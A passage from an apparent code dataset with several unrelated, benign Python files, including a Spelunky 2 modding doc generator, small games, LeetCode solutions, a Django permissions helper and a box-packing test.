}\n}\nmessage(inspect(look_ma_no_tostring))\n--[[prints:\n{\n number = 15,\n nested_table = {\n array = { 1, 2, 4 }\n }\n}\n]]\n```\"\"\"\n)\nprint(\"### `format`\")\nprint(\n \"\"\"This allows you to make strings without having to do a lot of `tostring` and `..` by placing your variables directly inside of the string. Use `F` in front of your string and wrap variables you want to print in `{}`, for example like this:\n```Lua\nfor _, player in players do\n local royal_title = nil\n if player:is_female() then\n royal_title = 'Queen'\n else\n royal_title = 'King'\n end\n local name = F'{player:get_name()} aka {royal_title} {player:get_short_name()}'\n message(name)\nend\n```\"\"\"\n)\n\nprint(\"## Unsafe mode\")\nprint(\n \"Setting `meta.unsafe = true` enables the rest of the standard Lua libraries like `io` and `os`, loading dlls with require and `package.loadlib`. 
Using unsafe scripts requires users to enable the option in the overlunky.ini file which is found in the Spelunky 2 installation directory.\"\n)\n\nprint(\"## Modules\")\nprint(\n \"\"\"You can load modules with `require \"mymod\"` or `require \"mydir.mymod\"`, just put `mymod.lua` in the same directory the script is, or in `mydir/` to keep things organized.\n\nCheck the [Lua tutorial](http://lua-users.org/wiki/ModulesTutorial) or examples how to actually make modules.\"\"\"\n)\n\nprint(\"## Global variables\")\nprint(\"\"\"These variables are always there to use.\"\"\")\nfor lf in funcs:\n if lf[\"name\"] in not_functions:\n print(\n \"### [`\"\n + lf[\"name\"]\n + \"`](https://github.com/spelunky-fyi/overlunky/search?l=Lua&q=\"\n + lf[\"name\"]\n + \")\"\n )\n for com in lf[\"comment\"]:\n print(com)\n\ndeprecated_funcs = [\n func for func in funcs if func[\"comment\"] and func[\"comment\"][0] == \"Deprecated\"\n]\nfuncs = [\n func\n for func in funcs\n if not func[\"comment\"] or not func[\"comment\"][0] == \"Deprecated\"\n]\n\nprint(\"## Functions\")\nprint(\n \"Note: The game functions like `spawn` use [level coordinates](#get_position). Draw functions use normalized [screen coordinates](#screen_position) from `-1.0 .. 1.0` where `0.0, 0.0` is the center of the screen.\"\n)\nfor lf in funcs:\n if len(rpcfunc(lf[\"cpp\"])):\n for af in rpcfunc(lf[\"cpp\"]):\n print_af(lf, af)\n elif not (lf[\"name\"].startswith(\"on_\") or lf[\"name\"] in not_functions):\n if lf[\"comment\"] and lf[\"comment\"][0] == \"NoDoc\":\n continue\n m = re.search(r\"\\(([^\\{]*)\\)\\s*->\\s*([^\\{]*)\", lf[\"cpp\"])\n m2 = re.search(r\"\\(([^\\{]*)\\)\", lf[\"cpp\"])\n ret = \"nil\"\n param = \"\"\n if m:\n ret = replace_all(m.group(2), replace).strip() or \"nil\"\n if m or m2:\n param = (m or m2).group(1)\n param = replace_all(param, replace).strip()\n name = lf[\"name\"]\n fun = f\"{ret} {name}({param})\".strip()\n search_link = \"https://github.com/spelunky-fyi/overlunky/search?l=Lua&q=\" + name\n print(f\"### [`{name}`]({search_link})\")\n print(f\"`{fun}`
\")\n for com in lf[\"comment\"]:\n print(com)\n\n\nprint(\"## Deprecated Functions\")\nprint(\n \"#### These functions still exist but their usage is discouraged, they all have alternatives mentioned here so please use those!\"\n)\n\nfor lf in events:\n if lf[\"name\"].startswith(\"on_\"):\n print(\n \"### [`\"\n + lf[\"name\"]\n + \"`](https://github.com/spelunky-fyi/overlunky/search?l=Lua&q=\"\n + lf[\"name\"]\n + \")\"\n )\n for com in lf[\"comment\"]:\n print(com)\n\nfor lf in deprecated_funcs:\n lf[\"comment\"].pop(0)\n if len(rpcfunc(lf[\"cpp\"])):\n for af in rpcfunc(lf[\"cpp\"]):\n print_af(lf, af)\n elif not (lf[\"name\"].startswith(\"on_\") or lf[\"name\"] in not_functions):\n if lf[\"comment\"] and lf[\"comment\"][0] == \"NoDoc\":\n continue\n m = re.search(r\"\\(([^\\{]*)\\)\\s*->\\s*([^\\{]*)\", lf[\"cpp\"])\n m2 = re.search(r\"\\(([^\\{]*)\\)\", lf[\"cpp\"])\n ret = \"nil\"\n param = \"\"\n if m:\n ret = replace_all(m.group(2), replace).strip() or \"nil\"\n if m or m2:\n param = (m or m2).group(1)\n param = replace_all(param, replace).strip()\n name = lf[\"name\"]\n fun = f\"{ret} {name}({param})\".strip()\n search_link = \"https://github.com/spelunky-fyi/overlunky/search?l=Lua&q=\" + name\n print(f\"### [`{name}`]({search_link})\")\n print(f\"`{fun}`
\")\n for com in lf[\"comment\"]:\n print(com)\n\nprint(\"## Types\")\nprint(\n \"Using the api through these directly is kinda dangerous, but such is life. I got pretty bored writing this doc generator at this point, so you can find the variable types in the [source files](https://github.com/spelunky-fyi/overlunky/tree/main/src/game_api). They're mostly just ints and floats. Example:\"\n)\nprint(\n \"\"\"```lua\n-- This doesn't make any sense, as you could just access the variables directly from players[]\n-- It's just a weird example OK!\nids = get_entities_by_mask(MASK.PLAYER) -- This just covers CHARs\nfor i,id in ipairs(ids) do\n e = get_entity(id):as_player() -- cast Entity to Player to access inventory\n e.health = 99\n e.inventory.bombs = 99\n e.inventory.ropes = 99\n e.type.jump = 0.36\nend\n```\"\"\"\n)\nfor type in types:\n print(\"### `\" + type[\"name\"] + \"`\")\n if \"comment\" in type:\n for com in type[\"comment\"]:\n print(com)\n if type[\"base\"]:\n print(\"Derived from\", end=\"\")\n bases = type[\"base\"].split(\",\")\n for base in bases:\n print(\" [`\" + base + \"`](#\" + base.lower() + \")\", end=\"\")\n print()\n for var in type[\"vars\"]:\n search_link = (\n \"https://github.com/spelunky-fyi/overlunky/search?l=Lua&q=\" + var[\"name\"]\n )\n if \"signature\" in var:\n signature = var[\"signature\"]\n m = re.search(r\"\\s*(.*)\\s+([^\\(]*)\\(([^\\)]*)\", var[\"signature\"])\n if m:\n ret = replace_all(m.group(1), replace) or \"nil\"\n name = m.group(2)\n param = replace_all(m.group(3), replace)\n signature = ret + \" \" + name + \"(\" + param + \")\"\n signature = signature.strip()\n type_str = var[\"type\"].replace(\"<\", \"<\").replace(\">\", \">\")\n print(f\"- [`{signature}`]({search_link}) {type_str}\")\n else:\n name = var[\"name\"]\n type_str = var[\"type\"].replace(\"<\", \"<\").replace(\">\", \">\")\n print(f\"- [`{name}`]({search_link}) {type_str}\")\n if \"comment\" in var and var[\"comment\"]:\n print(\"\\\\\")\n for com in var[\"comment\"]:\n print(com)\n\nprint(\"## Automatic casting of entities\")\nprint(\n \"When using `get_entity()` the returned entity will automatically be of the correct type. It is not necessary to use the `as_` functions.\"\n)\nprint(\"\")\nprint(\n \"To figure out what type of entity you get back, consult the [entity hierarchy list](entities-hierarchy.md)\"\n)\nprint(\"\")\nprint(\"For reference, the available `as_` functions are listed below:\")\nfor known_cast in known_casts:\n print(\"- \" + known_cast)\n\nprint(\"## Enums\")\nprint(\"Enums are like numbers but in text that's easier to remember. Example:\")\nprint(\n \"\"\"```lua\nset_callback(function()\n if state.theme == THEME.COSMIC_OCEAN then\n x, y, l = get_position(players[1].uid)\n spawn(ENT_TYPE.ITEM_JETPACK, x, y, l, 0, 0)\n end\nend, ON.LEVEL)\n```\"\"\"\n)\nfor type in enums:\n print(\"### \" + type[\"name\"])\n if \"comment\" in type:\n for com in type[\"comment\"]:\n print(com)\n for var in type[\"vars\"]:\n if var[\"name\"]:\n print(\n \"- [`\"\n + var[\"name\"]\n + \"`](https://github.com/spelunky-fyi/overlunky/search?l=Lua&q=\"\n + type[\"name\"]\n + \".\"\n + var[\"name\"]\n + \") \"\n + var[\"type\"]\n )\n else:\n print(\"- \" + var[\"type\"])\n if \"docs\" in var:\n print(var[\"docs\"])\n\nprint(\"## Aliases\")\nprint(\n \"We use those to clarify what kind of values can be passed and returned from a function, even if the underlying type is really just an integer or a string. 
This should help to avoid bugs where one would for example just pass a random integer to a function expecting a callback id.\"\n)\nfor alias in aliases:\n name = alias[\"name\"]\n type = alias[\"type\"]\n print(f\"### {name} == {type}\")\n\nprint(\"## External Function Library\")\nprint(\n 'If you use a text editor/IDE that has a Lua linter available you can download [spel2.lua](https://raw.githubusercontent.com/spelunky-fyi/overlunky/main/docs/game_data/spel2.lua), place it in a folder of your choice and specify that folder as a \"external function library\". For example [VSCode](https://code.visualstudio.com/) with the [Lua Extension](https://marketplace.visualstudio.com/items?itemName=sumneko.lua) offers this feature. This will allow you to get auto-completion of API functions along with linting'\n)\n","sub_path":"docs/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":30509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"492095763","text":"#!/usr/bin/env python\n'''\nCreated on 22 May 2019\n\n@author: qubix\n'''\n\nimport sys\nimport argparse\nimport os\n\nfrom utils.selection import select_bbox, select_seg_model, select_green_model\nfrom API.tile_manager import TileManager\nfrom utils.mapping import create_map\n\n\ndef main():\n parser = argument_parser()\n args = parser.parse_args(sys.argv[1:])\n compute_map(**vars(args))\n\n\ndef argument_parser():\n parser = argparse.ArgumentParser(\n prog=sys.argv[0],\n description=\"Mapping of greenery from street level imagery.\"\n )\n parser.add_argument(\n \"-m\", \"--model\",\n type=str,\n default=\"deeplab-mobilenet\",\n help=\"Machine learning model for segmentation of images. \"\n \"Default: 'deeplab-mobilenet'\"\n )\n parser.add_argument(\n \"-g\", \"--greenery-measure\",\n type=str,\n default=\"vegetation\",\n help=\"Greenery measure algorithm. \"\n \"Default: 'vegetation' \"\n \"Other options include {road, bus, sky, etc}.\"\n )\n parser.add_argument(\n \"-n\", \"--njobs\",\n type=int,\n default=1,\n dest=\"n_job\",\n help=\"Spread the work out over this many jobs. Default: 1\"\n )\n parser.add_argument(\n \"-i\", \"--jobid\",\n type=int,\n default=0,\n dest=\"job_id\",\n help=\"Id of the worker, should be in the range [0,njobs).\"\n )\n parser.add_argument(\n \"-b\", \"--bbox\",\n type=str,\n dest='bbox_str',\n default=\"amsterdam\",\n help=\"Bounding box of the map to be made. Format: \"\n \"'lat_SW,long_SW,lat_NE,long_NE'. 
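A known place name is also accepted. 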
Default: 'amsterdam'.\"\n )\n parser.add_argument(\n \"-l\", \"--grid-level\",\n type=int,\n dest=\"grid_level\",\n default=0,\n help=\"Set the detail of the grid, starting from 0 at a resolution of\"\n \" 1 per km, doubling the resolution by a factor of 2 for each\"\n \" level.\"\n )\n parser.add_argument(\n \"--skip-overlay\",\n default=False,\n dest=\"skip_overlay\",\n action='store_true',\n help=\"Do not create a kriged overlayed map.\"\n )\n parser.add_argument(\n \"--prepare\",\n default=False,\n dest=\"prepare_only\",\n action=\"store_true\",\n help=\"Only prepare the data, do not compute anything.\"\n )\n parser.add_argument(\n \"--panorama\",\n default=False,\n dest=\"use_panorama\",\n action=\"store_true\",\n help=\"Use panorama pictures instead of cubic pictures\"\n )\n return parser\n\n\ndef compute_map(model='deeplab-mobilenet', greenery_measure='vegetation',\n n_job=1, job_id=0, bbox_str='amsterdam', grid_level=0,\n skip_overlay=False, prepare_only=False, use_panorama=False):\n bbox = select_bbox(bbox_str)\n seg_kwargs = select_seg_model(model)\n green_kwargs = select_green_model(greenery_measure)\n cubic_pictures = not use_panorama\n\n tile_man = TileManager(bbox=bbox, grid_level=grid_level, n_job=n_job,\n job_id=job_id, **seg_kwargs, \n cubic_pictures=cubic_pictures,\n **green_kwargs)\n\n tile_man.green_direct(prepare_only=prepare_only)\n\n if prepare_only or skip_overlay:\n return\n\n overlay, key = tile_man.krige_map()\n overlay_dir = os.path.join(\"data.amsterdam\", \"maps\")\n overlay_file = f\"{bbox_str}_{key}.html\"\n overlay_fp = os.path.join(overlay_dir, overlay_file)\n os.makedirs(overlay_dir, exist_ok=True)\n\n create_map(overlay, html_file=overlay_fp)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"streetgreen.py","file_name":"streetgreen.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553018956","text":"class InvalidInput_RPS(Exception): pass\n\n# Possible game inputs\nOPTIONS = [1, 2, 3]\nINPUTS_TO_STRINGS = {1:'R', 2:'P', 3:'S'} # Not sure if I'll even use these dicts\nSTRINGS_TO_INPUTS = {string: input for input, string in INPUTS_TO_STRINGS.items()} # Reverse the dict above\n\n\ndef rps_round(input1, input2):\n '''\n # Evaluates one round of RPS. This is the lowest level function for the game.\n :param input1: This is the player input. String. 1, 2, or 3.\n :param input2: This is the computer (opponent) input. String. 
1, 2, or 3.\n :return: 1 if input1 wins, 0 for a tie, -1 if input1 loses.\n '''\n global OPTIONS\n if (input1 not in OPTIONS) or (input2 not in OPTIONS):\n raise InvalidInput_RPS('Input must be 1 (Rock), 2 (Paper), or 3 (Scissors). '\n f'You entered {input1} and {input2}.')\n\n r, p, s = OPTIONS\n win_matrix = {r: {r: 0, # i.e., if input1 is rock, input2 is rock = tie\n p: -1, # input2 is paper = loss\n s: 1}, # input2 is scissors = win\n p: {r: 1,\n p: 0,\n s: -1},\n s: {r: -1,\n p: 1,\n s: 0}\n }\n\n outcome = win_matrix[input1][input2]\n return outcome\n","sub_path":"source/game/rps_game.py","file_name":"rps_game.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"605272296","text":"class Solution(object):\n def countAndSay(self, n):\n \"\"\"\n :type n: int\n :rtype: str\n \"\"\"\n result = \"1\" # the sequence starts at \"1\"\n for i in range(n - 1): # each pass reads off the previous term\n result = self.scanAndCompose(result)\n return result\n\n def scanAndCompose(self, number_string):\n last = number_string[0]\n count = 1\n result = ''\n for index in range(1, len(number_string)):\n if number_string[index] == last:\n count += 1\n else:\n result += str(count) + last\n last = number_string[index]\n count = 1\n else:\n result += str(count) + last\n\n return result\n\na = Solution()\n","sub_path":"Python/CountandSay.py","file_name":"CountandSay.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"632697481","text":"# -*- coding: utf-8 -*- \n# leetcode time cost : 60 ms\n# leetcode memory cost : 15.1 MB \n# Time Complexity: O(N)\n# Space Complexity: O(1)\nfrom typing import List\nclass Solution:\n def canJump(self, nums: List[int]) -> bool:\n if len(nums) == 1: return True # a single element is always reachable\n max_distance = 0 # furthest index reachable so far\n for i in range(len(nums)):\n if i > max_distance: # the current index cannot be reached by any jump\n return False\n max_distance = max(max_distance, i + nums[i]) # extend the furthest reachable index\n return True \n \ndef main():\n nums = [2,3,1,1,4]\n expect = True\n obj = Solution()\n result = obj.canJump(nums)\n try:\n assert result == expect\n print(\"passed, result matches expect:\", result)\n except AssertionError as aError:\n print('failed, result is wrong', result, aError.__str__())\n \nif __name__ =='__main__':\n main() ","sub_path":"[0055][Medium][Jump_Game]/Jump_Game_3.py","file_name":"Jump_Game_3.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"318895445","text":"from bs4 import BeautifulSoup\nimport time\nimport requests\nfrom datetime import datetime\n\n# get the device's ship date\ndef shipDate(serial):\n url = \"https://www.dell.com/support/components/dashboard/us/en/04/Warranty/GetWarrantyDetails\"\n # make a post request to the dell warranty site\n r = requests.post(url, data=dict(\n serviceTag=str(serial),\n isSerializedProduct=False\n ))\n # on success, parse the ship date out of the warranty table\n if r.status_code == 200:\n soup = BeautifulSoup(r.text, \"html.parser\")\n tds = soup.find_all(\"td\")\n shipDate = \"\"\n for dataCell in tds:\n data = str(dataCell.text.strip())\n index = data.find(\"Ship Date\")\n if index != -1:\n shipDate = data[(data.find(\": \") + 2):]\n shipDate = datetime.strptime(shipDate, '%d %b %Y').date()\n shipDate = datetime.strftime(shipDate, '%m/%d/%Y')\n return shipDate\n # could not get the ship date\n else:\n return False\n\n# get the device's name\ndef name(serial):\n url = 
\"https://www.dell.com/support/home/us/en/04/product-support/servicetag/{}/events\".format(serial)\n name = \"\"\n r = requests.post(url)\n if r.status_code == 200:\n try:\n soup = BeautifulSoup(r.text, \"html.parser\")\n h1 = soup.find(\"h1\")\n h1 = str(h1.text.strip())\n name = h1[h1.index(\"Support for\") + len(\"Support for\") + 1:].split('\\n')[0]\n return name\n except:\n pass\n return False\n","sub_path":"info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"274576064","text":"from rest_framework.reverse import reverse\nfrom scanner.tasks import Scanner\nfrom models import Monitor, PeriodicTask, ScanReport\n\n\nclass Monitoring(Scanner):\n def run(self, target_url):\n self._target_url = target_url\n self.scan()\n\n periodic_task = PeriodicTask.objects.get(\n name=target_url\n )\n\n monitor = Monitor.objects.get(\n periodic_task=periodic_task\n )\n\n monitor.report = ScanReport(\n result=self.get_report()\n )\n monitor_report = monitor.report\n monitor_report.target_url = target_url\n monitor_report.result_url = reverse(\n viewname='report-view',\n args=[monitor_report.pk]\n )\n monitor_report.save()\n\n monitor.save()\n","sub_path":"monitoring/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"474799638","text":"\r\n\r\nimport tkinter as tk\r\nimport re\r\nimport Calendar\r\nfrom Notes_widget import show_notes_widget\r\n\r\n\r\nclass MainMenu(tk.Frame):\r\n def __init__(self, parent,):\r\n super().__init__(parent)\r\n self.init_main(parent)\r\n\r\n # Configuring Frame object on the Main window\r\n def init_main(self, parent):\r\n self.btn1 = tk.Button(text='Show my notes', width=20, height=3,\r\n command=lambda : Calendar.show_calendar(parent, self.get_root_position()))\r\n self.btn2 = tk.Button(text='Enter your notes', width=20, height=3,\r\n command=lambda : show_notes_widget(self.get_root_position()))\r\n\r\n self.btn1.pack()\r\n self.btn2.pack()\r\n\r\n def get_root_position(self):\r\n self.update_idletasks()\r\n self.width, self.height, self.x, self.y = re.split(r'[x+]', root.geometry())\r\n return self.width, self.height, self.x, self.y\r\n\r\n\r\nif __name__ == '__main__':\r\n # Creating Main window\r\n root = tk.Tk()\r\n root.title('ИВРО')\r\n root.update_idletasks()\r\n root.width = 180\r\n root.height = 110\r\n root.x = (root.winfo_screenwidth() - root.winfo_reqwidth()) / 2\r\n root.y = (root.winfo_screenheight() - root.winfo_reqheight()) / 2\r\n root.geometry(f'{root.width}x{root.height}+{int(root.x - root.width / 2)}+{int(root.y - root.height / 2)}')\r\n root.resizable(False, False)\r\n\r\n # Creating Frame object\r\n app = MainMenu(root)\r\n app.pack()\r\n\r\n root.mainloop()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"343726817","text":"import math\nimport random\nimport pygame\nfrom pygame import mixer\n\n# Intialize the pygame\npygame.init()\n\n# create the screen\nscreen = pygame.display.set_mode((800, 600))\n\n# Background\nbackground = pygame.image.load('battleground.jpg')\n\n# Sound\nmixer.music.load(\"happysound.mp3\")\nmixer.music.play(-1)\n\n# Caption and Icon\npygame.display.set_caption(\"Shinigami Spell\")\nicon = 
pygame.image.load('sanfire.png')\npygame.display.set_icon(icon)\n\n# warrior\nwarriorImg = pygame.image.load('warrior.png')\nwarriorX = 370\nwarriorY = 530\nwarriorX_change = 0\n\n# Shinigami\nShinigamiImg = []\nShinigamiX = []\nShinigamiY = []\nShinigamiX_change = []\nShinigamiY_change = []\nnum_of_Shinigamies = 5\n\nfor i in range(num_of_Shinigamies):\n ShinigamiImg.append(pygame.image.load('sanfire.png'))\n ShinigamiX.append(random.randint(0, 736))\n ShinigamiY.append(random.randint(30, 150))\n ShinigamiX_change.append(4)\n ShinigamiY_change.append(40)\n\n# Spell\n\n# Ready - You can't see the spell on the screen\n# Fire - The spell is currently moving\n\nspellImg = pygame.image.load('fireworks.png')\nspellX = 0\nspellY = 480\nspellX_change = 0\nspellY_change = 5\nspell_state = \"ready\"\n\n# Score\n\nscore_value = 0\nfont = pygame.font.Font('freesansbold.ttf', 32)\n\ntextX = 10\ntestY = 10\n\n# Game Over\nover_font = pygame.font.Font('freesansbold.ttf', 64)\n\n\ndef show_score(x, y):\n score = font.render(\"Score : \" + str(score_value), True, (255, 255, 255))\n screen.blit(score, (x, y))\n\n\ndef game_over_text():\n over_text = over_font.render(\"GAME OVER\", True, (255, 255, 255))\n screen.blit(over_text, (200, 250))\n\n\ndef warrior(x, y):\n screen.blit(warriorImg, (x, y))\n\n\ndef Shinigami(x, y, i):\n screen.blit(ShinigamiImg[i], (x, y))\n\n\ndef fire_spell(x, y):\n global spell_state\n spell_state = \"fire\"\n screen.blit(spellImg, (x + 16, y + 10))\n\n\ndef isCollision(ShinigamiX, ShinigamiY, spellX, spellY):\n distance = math.sqrt(math.pow(ShinigamiX - spellX, 2) + (math.pow(ShinigamiY - spellY, 2)))\n if distance < 27:\n return True\n else:\n return False\n\n\n# Game Loop\nrunning = True\nwhile running:\n\n # RGB = Red, Green, Blue\n screen.fill((0, 0, 0))\n # Background Image\n screen.blit(background, (0, 0))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n # if keystroke is pressed check whether its right or left\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n warriorX_change = -5\n if event.key == pygame.K_RIGHT:\n warriorX_change = 5\n if event.key == pygame.K_SPACE:\n if spell_state==\"ready\":\n spellSound = mixer.Sound(\"magicspellmusic.mp3\")\n spellSound.play()\n # Get the current x cordinate of the spaceship\n spellX = warriorX\n fire_spell(spellX, spellY)\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n warriorX_change = 0\n\n # 5 = 5 + -0.1 -> 5 = 5 - 0.1\n # 5 = 5 + 0.1\n\n warriorX += warriorX_change\n if warriorX <= 0:\n warriorX = 0\n elif warriorX >= 736:\n warriorX = 736\n\n # Shinigami Movement\n for i in range(num_of_Shinigamies):\n\n # Game Over\n if ShinigamiY[i] > 440:\n for j in range(num_of_Shinigamies):\n ShinigamiY[j] = 2000\n game_over_text()\n break\n\n ShinigamiX[i] += ShinigamiX_change[i]\n if ShinigamiX[i] <= 0:\n ShinigamiX_change[i] = 1\n ShinigamiY[i] += ShinigamiY_change[i]\n elif ShinigamiX[i] >= 736:\n ShinigamiX_change[i] = -1\n ShinigamiY[i] += ShinigamiY_change[i]\n\n # Collision\n collision = isCollision(ShinigamiX[i], ShinigamiY[i], spellX, spellY)\n if collision:\n explosionSound = mixer.Sound(\"fireball.mp3\")\n explosionSound.play()\n spellY = 480\n spell_state = \"ready\"\n score_value += 1\n ShinigamiX[i] = random.randint(0, 736)\n ShinigamiY[i] = random.randint(50, 150)\n\n Shinigami(ShinigamiX[i], ShinigamiY[i], i)\n\n # spell Movement\n if spellY <= 0:\n spellY = 480\n spell_state = \"ready\"\n\n if spell_state 
==\"fire\":\n fire_spell(spellX, spellY)\n spellY -= spellY_change\n\n warrior(warriorX, warriorY)\n show_score(textX, testY)\n pygame.display.update()\n","sub_path":"shinigamispellcode.py","file_name":"shinigamispellcode.py","file_ext":"py","file_size_in_byte":4525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228479983","text":"from django.contrib.auth.models import Permission\n\nfrom DeBar.classes import Text\nfrom DeBar.funcoes.function import getUser\nfrom DeBar.funcoes.getdata import getAllPermissoes\n\nclass Permissoes(object):\n\n def __init__(self, request, user=None):\n\n self.request = request\n self.user = user\n self.permissoes = {}\n\n permissoesBanco = self.getAllPermissoes()\n\n for perm in permissoesBanco.items():\n\n dict = {perm[1].keys()[0]: perm[1].items()[0][1]}\n self.permissoes.update(dict)\n\n def getPermissoesTela(self):\n\n for nome, texto in self.permissoes.items():\n\n try:\n marcadoTela = self.request.POST.get(nome)\n if marcadoTela == 'on':\n\n self.permissoes[nome]['marcadoNaTela'] = True\n except Exception as e:\n teste = e.message\n pass\n\n def darPermissoes(self, user):\n\n for nome, texto in self.permissoes.items():\n try:\n\n objetoPermissao = Permission.objects.get(codename = nome)\n if self.permissoes[nome]['marcadoNaTela']:\n\n user.user_permissions.add(objetoPermissao)\n\n else:\n\n user.user_permissions.remove(objetoPermissao)\n except:\n self.mensagem = Text().erro_dar_permissoes()\n\n def darTodasPermissoes(self, user):\n\n for nome in self.permissoes:\n try:\n objetoPermissao = Permission.objects.get(codename = nome)\n user.user_permissions.add(objetoPermissao)\n except Exception as e:\n self.mensagem = Text().erro_dar_permissoes()\n\n\n def getAllPermissoes(self):\n\n import django.apps\n\n modelos = django.apps.apps.get_models()\n perm_dict = None\n\n for modelo in modelos:\n try:\n permissoes = modelo._meta.original_attrs['permissions']\n perm = None\n\n for permissao in permissoes:\n if perm:\n if self.user:\n perm.update({permissao[0] : {\"texto\" :permissao[1],\n \"temPermissao\" : self.user.has_perm(\"DeBar.\" + permissao[0]),\n \"marcadoNaTela\": None}})\n else:\n perm.update({permissao[0]: {\"texto\": permissao[1],\n \"temPermissao\": False,\n \"marcadoNaTela\": None}})\n\n else:\n if self.user:\n perm = {permissao[0] : {\"texto\" :permissao[1],\n \"temPermissao\" :self.user.has_perm(\"DeBar.\" + permissao[0]),\n \"marcadoNaTela\": None}}\n else:\n perm = {permissao[0]: {\"texto\": permissao[1],\n \"temPermissao\": False,\n \"marcadoNaTela\": None}}\n else:\n if perm_dict:\n perm_dict.update({modelo._meta.verbose_name: perm})\n else:\n perm_dict = {modelo._meta.verbose_name: perm}\n except Exception as e:\n coisa = e.message\n pass\n\n return perm_dict\n\n","sub_path":"DeBar/classes/usuario/permissoes.py","file_name":"permissoes.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"411759642","text":"from py3dbp import Item, Bin, Packer\nprint('start')\nfrom copy import deepcopy\n\npacker = Packer()\n\npacker.add_bin(Bin('small-envelope 1', 85, 85, 85, 124))\n\nfor j in range(11):\n a = Item('Beauty & Personal Care {}'.format(j), 19, 19, 19, 12)\n packer.add_item(a)\n\nfor j in range(14):\n a = Item('Tools & Home Improvement {}'.format(j), 6, 6, 6, 4)\n packer.add_item(a)\n \nfor j in range(8):\n a = Item('Audible Books & Originals {}'.format(j), 15, 15, 15, 8)\n 
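# register this item with the packer; both packing runs below start from deep copies of the same packer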
packer.add_item(a)\n\nimport time\nnow = time.time()\npacker_1 = deepcopy(packer)\npacker_2 = deepcopy(packer)\n\npacker = packer_1\npacker.algorithm_1()\nprint('start')\nfor b in packer.bins:\n print(b.string())\n for i in b.items:\n print(\"====> \", i.string())\nif packer.unfit_items:\n print('Unfit items')\n for b in packer.unfit_items:\n print(\"====> \", b.string())\n\npacker = packer_2\npacker.algorithm_2()\n\nprint('start')\nfor b in packer.bins:\n print(b.string())\n for i in b.items:\n print(\"====> \", i.string())\nif packer.unfit_items:\n print('Unfit items')\n for b in packer.unfit_items:\n print(\"====> \", b.string())\nprint(time.time() - now)","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"129095386","text":"import sys\n\n\nclass DrawingTool:\n def __init__(self, in_file_name='input.txt', out_file_name='output.txt'):\n try:\n if sys.argv[1] == 'help':\n help_print()\n sys.exit(0)\n except IndexError:\n pass\n try:\n self.input_file_name = sys.argv[1]\n open(self.input_file_name)\n except IndexError:\n self.input_file_name = in_file_name\n except OSError:\n print('Please enter a valid \"input file\" name (default: \"input.txt\")')\n help_print()\n sys.exit(0)\n try:\n self.output_file_name = sys.argv[2]\n except IndexError:\n self.output_file_name = out_file_name\n self.command_list = ['C', 'L', 'R', 'B']\n self.canvas = []\n\n def draw(self):\n with open(self.input_file_name) as command_set:\n for parameter in command_set.readlines():\n parameter = parameter.split()\n if parameter[0] in self.command_list:\n if parameter[0] == self.command_list[0]:\n self.create_canvas(parameter[1], parameter[2])\n if len(self.canvas) != int(parameter[2]) or len(self.canvas[0]) != int(parameter[1]):\n raise Exception('not valid canvas has been created')\n self.paint()\n if parameter[0] == self.command_list[1]:\n self.create_line(parameter[1], parameter[2], parameter[3], parameter[4])\n self.paint()\n elif parameter[0] == self.command_list[2]:\n self.create_rect(parameter[1], parameter[2], parameter[3], parameter[4])\n self.paint()\n elif parameter[0] == self.command_list[3]:\n self.bucket_fill(parameter[1], parameter[2], parameter[3])\n self.paint()\n else:\n raise Exception('Input file is not valid')\n\n def create_canvas(self, size_x, size_y):\n for string in range(int(size_y)):\n self.canvas.append([])\n for symbol in range(int(size_x)):\n self.canvas[string].append(' ')\n\n def create_line(self, x1, y1, x2, y2):\n x1, y1, x2, y2 = int(x1), int(y1), int(x2), int(y2)\n if y2 - y1 == 0:\n for string in range(y1 - 1, y2):\n if x2 - x1 > 0:\n for symbol in range(x1 - 1, x2):\n self.canvas[string][symbol] = 'x'\n else:\n self.canvas[string][x1] = 'x'\n elif y2 - y1 > 0:\n for string in range(y1 - 1, y2):\n self.canvas[string][x1 - 1] = 'x'\n\n def create_rect(self, x1, y1, x2, y2):\n self.create_line(x1, y1, x2, y1)\n self.create_line(x1, y2, x2, y2)\n self.create_line(x1, y1, x1, y2)\n self.create_line(x2, y1, x2, y2)\n\n def bucket_fill(self, x, y, color):\n x, y = int(x), int(y)\n if self.canvas[y][x] == ' ':\n self.canvas[y][x] = color\n if x > 0:\n self.bucket_fill(x-1, y, color)\n if x < len(self.canvas[0])-1:\n self.bucket_fill(x + 1, y, color)\n if y < len(self.canvas) - 2:\n self.bucket_fill(x, y+1, color)\n if y > 0:\n self.bucket_fill(x, y - 1, color)\n\n def paint(self):\n with open(self.output_file_name, 'a') as out:\n out.write('-' * 
